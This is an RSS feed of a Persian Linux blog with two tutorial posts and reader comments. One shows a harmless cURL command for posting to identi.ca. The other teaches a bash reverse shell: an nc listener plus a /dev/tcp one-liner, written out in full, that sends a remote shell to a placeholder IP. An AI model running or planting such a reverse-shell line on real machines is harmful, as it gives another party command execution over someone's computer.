<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>خود خودمان &#187; shell</title>
	<atom:link href="http://www.sadeq.ir/tags/shell/feed/" rel="self" type="application/rss+xml" />
	<link>http://www.sadeq.ir</link>
	<description>نوشته‌های صادق و مریم</description>
	<lastBuildDate>Sat, 04 Feb 2012 22:34:01 +0000</lastBuildDate>
	<language>fa</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.3.1</generator>
		<item>
		<title>و تو چه دانی که cURL‌ چیست؟</title>
		<link>http://www.sadeq.ir/1388/11/138/what-is-curl-identi-ca-sample/</link>
		<comments>http://www.sadeq.ir/1388/11/138/what-is-curl-identi-ca-sample/#comments</comments>
		<pubDate>Fri, 05 Feb 2010 02:30:19 +0000</pubDate>
		<dc:creator>صادق</dc:creator>
				<category><![CDATA[رایانه]]></category>
		<category><![CDATA[گنولینوکس]]></category>
		<category><![CDATA[curl]]></category>
		<category><![CDATA[date]]></category>
		<category><![CDATA[identica]]></category>
		<category><![CDATA[linux]]></category>
		<category><![CDATA[shell]]></category>

		<guid isPermaLink="false">http://www.sadeq.ir/?p=138</guid>
		<description><![CDATA[گنو/لینوکس مجموعه‌ای از ابزارهای خیلی کوچولو اما بسیار پرقدرت است. این ابزارها به سادگی با هم ترکیب می‌شوند و نتیجه‌اش این میشه که کارهای خیلی پیچیده را می‌شه به سادگی انجام داد.
یکی از این ابزاهای خیلی خوب curl‌ است. در معرفی curl آمده: ابزاری است برای ارسال داده «از» یا «به» سرور  با پروتکل‌هایی [...]]]></description>
			<content:encoded><![CDATA[<p>گنو/لینوکس مجموعه‌ای از ابزارهای خیلی کوچولو اما بسیار پرقدرت است. این ابزارها به سادگی با هم ترکیب می‌شوند و نتیجه‌اش این میشه که کارهای خیلی پیچیده را می‌شه به سادگی انجام داد.<br />
یکی از این ابزاهای خیلی خوب curl‌ است. در معرفی curl آمده: ابزاری است برای ارسال داده «از» یا «به» سرور  با پروتکل‌هایی که پشتیبانی میکنه (مثلا http, https, ftp, telnet‌ و &#8230;) این ابزار به نحوی طراحی شده است که بدون نیاز به ارتباط با کاربر وظیفه‌ش را انجام بده.</p>
<p>یک مثال:<br />
سایتی به نام <a href="http://identi.ca/">identi.ca</a> که یک پیاده‌سازی از ابزار StatusNet برای Microbloggin (مشابه توییتر) است به شما این اجازه را می‌ده که با استفاده از <a href="http://status.net/wiki/API">API</a> پست خودتون را ارسال/دریافت کنید.<br />
روش ارسال به این نحو است که باید محتوی توییت خودتون را به نشانی http://identi.ca/api/statuses/update.xml  پست کنید. البته شناسه کاربری و کلمه عبور باید از طریق http authentication  به سرور اعلام کنید.<br />
برای این کار یک دستور curl کافیه:</p>
<pre class="brush:shell" style="direction:ltr">curl http://identi.ca/api/statuses/update.xml  -u USERNAME:PASSWORD -d "status=This is a test Dent from Shell" </pre>
<p>به همین سادگی.<br />
اگه دوست داشته باشید می‌تونید مثلا این دستور را با یه دستور دیگه قاطی کنید که نتیجه اون دستور را dent کنه. مثلا من یه اعلام ساعت با استفاده از دستور date درست کردم که با استفاده از cron سر هر ساعت گذشت زمان را به من یادآوری می‌کنه:</p>
<pre class="brush:shell" style="direction:ltr">curl http://identi.ca/api/statuses/update.xml  -u USERNAME:PASSWORD -d "status=Now: `date +\"%Y-%m-%d %H:%M\"`"</pre>
<p>خوبه نه؟</p>

				<div>
					<h4>2 دیدگاه برای این نوشته:</h4><ol>
						  <li><img alt='' src='http://1.gravatar.com/avatar/df11f04eba996eb3523af466fbdbeadb?s=32&amp;d=http%3A%2F%2F1.gravatar.com%2Favatar%2Fad516503a11cd5ca435acc9bb6523536%3Fs%3D32&amp;r=G' class='avatar avatar-32 photo' height='32' width='32' /><i>میلاد خواجوی:</i>
							<br />
							<small><a rel="nofollow" href="http://www.sadeq.ir/1388/11/138/what-is-curl-identi-ca-sample/comment-page-1/#comment-63">۱۶ بهمن ۱۳۸۸</a></small>
							خیلی خوبه، مخصوصا برای سوکت پروگرامینگ و اینا و اونا
						  </li>
						  <li><img alt='' src='http://0.gravatar.com/avatar/c59d95fa92e8bc796add2c33d6c1bdbe?s=32&amp;d=http%3A%2F%2F0.gravatar.com%2Favatar%2Fad516503a11cd5ca435acc9bb6523536%3Fs%3D32&amp;r=G' class='avatar avatar-32 photo' height='32' width='32' /><i>دهاتی:</i>
							<br />
							<small><a rel="nofollow" href="http://www.sadeq.ir/1388/11/138/what-is-curl-identi-ca-sample/comment-page-1/#comment-64">۱۶ بهمن ۱۳۸۸</a></small>
							بله خوبه
دستت درد نکنه
						  </li>
					  </ol>
				  </div>
			  <p><b><a target="_blank" href="http://www.sadeq.ir/?cof_write=138">ارسال نظر سریع</a></b></p><img width="6" height="5" src="http://www.sadeq.ir/wp-content/plugins/google-reader-stats/google-reader-view.php?id=138" />]]></content:encoded>
			<wfw:commentRss>http://www.sadeq.ir/1388/11/138/what-is-curl-identi-ca-sample/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>شل برعکسی! فقط برای لینوکسی‌ها!</title>
		<link>http://www.sadeq.ir/1388/11/100/revese-shell-just-for-linux-users/</link>
		<comments>http://www.sadeq.ir/1388/11/100/revese-shell-just-for-linux-users/#comments</comments>
		<pubDate>Wed, 27 Jan 2010 14:03:12 +0000</pubDate>
		<dc:creator>صادق</dc:creator>
				<category><![CDATA[رایانه]]></category>
		<category><![CDATA[گنولینوکس]]></category>
		<category><![CDATA[linux]]></category>
		<category><![CDATA[nc]]></category>
		<category><![CDATA[shell]]></category>
		<category><![CDATA[شل]]></category>
		<category><![CDATA[هک]]></category>

		<guid isPermaLink="false">http://www.sadeq.ir/?p=100</guid>
		<description><![CDATA[بعضی وقت‌ها نیاز میشه که به شل یه لینوکس از راه دور دسترسی پیدا کنید. اما این شل پشت یه فایروالی، natـی، چیزی است که در عمل به شما اجازه دسترسی نمیده.
برای رفع مشکل از یه روشی میشه استفاده کرد به اسم reverse shell!
یه سری ابزار برای اینکار وجود داره اما یه راه سریع هم [...]]]></description>
			<content:encoded><![CDATA[<p>بعضی وقت‌ها نیاز میشه که به شل یه لینوکس از راه دور دسترسی پیدا کنید. اما این شل پشت یه فایروالی، natـی، چیزی است که در عمل به شما اجازه دسترسی نمیده.</p>
<p>برای رفع مشکل از یه روشی میشه استفاده کرد به اسم reverse shell!</p>
<p>یه سری ابزار برای اینکار وجود داره اما یه راه سریع هم هست! یه دستور داریم به نام nc که خیلی مفیده! با این دستور می‌تونید یه پورت روی کامپیوتر خودتون باز کنید و هر کی بهش وصل میشه را مشاهده کنید. بعد هر چی شما بگین ارسال بشه برای اون و هرچی هم اون میفرسته شما روی مانیتور ببینید. البته این یه کاربرد این ابزاره که برای کار ما به درد می‌خوره:<br />
روی کامپیوتر خودتون دستور زیر را اجرا کنید:</p>
<pre class="brush:perl" style="direction:ltr">nc -l -p 8080 -vvv</pre>
<p>بعد به دوستتون بگین که روی کامپیوتر خودش این دو تا دستور را اجرا کنه:</p>
<pre class="brush:perl" style="direction:ltr">exec 5&lt;&gt;/dev/tcp/YOUR_PUBLIC_IP_ADDRESS/8080
cat &lt;&amp;5 | while read line; do $line 2&gt;&amp;5 &gt;&amp;5; done</pre>
<p>با اجرای دستور دوم توسط دوستتون شما به یه شل ساده دسترسی پیدا می‌کنید و هر دستوری که تایپ کنید ارسال می‌شه روی کامپیوتر دوستتون و اونجا اجرا می‌شه و خروجیش هم برای شما برمیگرده!<br />
واضح است که به جای YOUR_PUBLIC_IP_ADDRESS باید آی‌پی اینترنت کامپیوتر خودتون را بزارین. که البته باید از اینترنت قابل دسترس باشد. و البته می‌تونید در هر دو طرف ۸۰۸۰ را با یه شماره پورت دیگه عوض کنید!<br />
به همین سادگی به همین خوشمزگی! اینه قدرت لینوکس! حالا ویندوزیا خودشون را بکشند نرم‌افزار team viewer پیدا می‌کنند! <img src='http://www.sadeq.ir/wp-includes/images/smilies/icon_wink.gif' alt=';-)' class='wp-smiley' /><br />
البته شعار گوگل فراموش نشه! not be evil!</p>
<p>پ.ن.۱: این روش را <a href="http://www.gnucitizen.org/blog/reverse-shell-with-bash/">اینجا</a> خوندم<br />
پ.ن.۲: nc در معرفی خودش می‌گه:</p>
<div style="direction: ltr;">nc: TCP/IP swiss army knife</p>
<div style="direction: rtl;">معنی اون هم که واضحه نه؟</div>
</div>

				<div>
					<h4>7 دیدگاه برای این نوشته:</h4><ol>
						  <li><img alt='' src='http://0.gravatar.com/avatar/a40fa5f4ed9c29dfbc3b6ec60509f587?s=32&amp;d=http%3A%2F%2F0.gravatar.com%2Favatar%2Fad516503a11cd5ca435acc9bb6523536%3Fs%3D32&amp;r=G' class='avatar avatar-32 photo' height='32' width='32' /><i>جادی:</i>
							<br />
							<small><a rel="nofollow" href="http://www.sadeq.ir/1388/11/100/revese-shell-just-for-linux-users/comment-page-1/#comment-54">۰۸ بهمن ۱۳۸۸</a></small>
							جالب بود (: حتما در «لینوکس در هفته‌ای که گذشت» این هفته لینک می‌دم.
						  </li>
						  <li><img alt='' src='http://0.gravatar.com/avatar/a87590e8650a767eb8c728aafbb609ac?s=32&amp;d=http%3A%2F%2F0.gravatar.com%2Favatar%2Fad516503a11cd5ca435acc9bb6523536%3Fs%3D32&amp;r=G' class='avatar avatar-32 photo' height='32' width='32' /><i>erghezi:</i>
							<br />
							<small><a rel="nofollow" href="http://www.sadeq.ir/1388/11/100/revese-shell-just-for-linux-users/comment-page-1/#comment-57">۱۲ بهمن ۱۳۸۸</a></small>
							فقط خط دومی رو می زدم شل وا می ستاد!! 

نتیجه انکه دستورایی که طرف می‌زد رو نمی‌دیدم:دی 

خیلی جالب و به درد بخور بود
						  </li>
						  <li><img alt='' src='http://0.gravatar.com/avatar/2cbfb235e41ed09d58efb3473a967f2c?s=32&amp;d=http%3A%2F%2F0.gravatar.com%2Favatar%2Fad516503a11cd5ca435acc9bb6523536%3Fs%3D32&amp;r=G' class='avatar avatar-32 photo' height='32' width='32' /><i>سهیل:</i>
							<br />
							<small><a rel="nofollow" href="http://www.sadeq.ir/1388/11/100/revese-shell-just-for-linux-users/comment-page-1/#comment-58">۱۳ بهمن ۱۳۸۸</a></small>
							تمام اشخاصی که در حیطه ی امنیت شبکه فعالیت میکنند کاملا از این ابزار اگاهی دارن و استفاده میکنند
در ضمن باید بدانید که نسخه ویندوزی این نرم افزار نیز موجود 
می باشد
						  </li>
						  <li><img alt='' src='http://0.gravatar.com/avatar/ef2e8dac346d0539f9fed9456c3d52b0?s=32&amp;d=http%3A%2F%2F0.gravatar.com%2Favatar%2Fad516503a11cd5ca435acc9bb6523536%3Fs%3D32&amp;r=G' class='avatar avatar-32 photo' height='32' width='32' /><i>احمد:</i>
							<br />
							<small><a rel="nofollow" href="http://www.sadeq.ir/1388/11/100/revese-shell-just-for-linux-users/comment-page-1/#comment-59">۱۳ بهمن ۱۳۸۸</a></small>
							جالب بود با گره ی مربوط به tcpip در یونیکس آشنا نبودم.
						  </li>
						  <li><img alt='' src='http://1.gravatar.com/avatar/9a6fe434e31c7dd56d09ac05da2bee36?s=32&amp;d=http%3A%2F%2F1.gravatar.com%2Favatar%2Fad516503a11cd5ca435acc9bb6523536%3Fs%3D32&amp;r=G' class='avatar avatar-32 photo' height='32' width='32' /><i>مهدی:</i>
							<br />
							<small><a rel="nofollow" href="http://www.sadeq.ir/1388/11/100/revese-shell-just-for-linux-users/comment-page-1/#comment-60">۱۳ بهمن ۱۳۸۸</a></small>
							خیلی جالب بود. من رو کامپیوتر خودم امتحان کردم.
						  </li>
					  </ol>
				  </div>
			  <p><b><a target="_blank" href="http://www.sadeq.ir/?cof_write=100">ارسال نظر سریع</a></b> | مشاهده‌ <a target="_blank" href="http://www.sadeq.ir/?cof_list=100">2 نظر دیگر</a></p><img width="6" height="5" src="http://www.sadeq.ir/wp-content/plugins/google-reader-stats/google-reader-view.php?id=100" />]]></content:encoded>
			<wfw:commentRss>http://www.sadeq.ir/1388/11/100/revese-shell-just-for-linux-users/feed/</wfw:commentRss>
		<slash:comments>7</slash:comments>
		</item>
	</channel>
</rss>

